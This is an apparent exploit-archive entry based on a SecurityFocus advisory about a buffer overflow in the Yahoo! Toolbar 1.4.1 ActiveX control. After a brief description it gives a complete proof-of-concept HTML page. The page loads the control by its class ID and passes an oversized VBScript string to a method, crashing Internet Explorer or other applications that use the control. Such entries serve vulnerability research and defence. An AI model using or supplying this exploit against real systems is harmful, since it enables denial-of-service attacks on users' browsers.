9 lines
No EOL
657 B
HTML
Executable file
9 lines
No EOL
657 B
HTML
Executable file
source: http://www.securityfocus.com/bid/26656/info
|
|
|
|
Yahoo! Toolbar ActiveX Control is prone to a buffer-overflow vulnerability.
|
|
|
|
An attacker can exploit this issue to trigger denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Reports indicate that code execution is not possible, but this has not been confirmed.
|
|
|
|
Yahoo! Toolbar 1.4.1 is vulnerable to this issue; other versions may also be affected.
|
|
|
|
<html><body> <object id=target classid=clsid:02478D38-C3F9-4EFB-9B51-7695ECA05670></object> <script language=vbscript> arg1=String(517140, "A") target.c arg1 </script> </body></html> |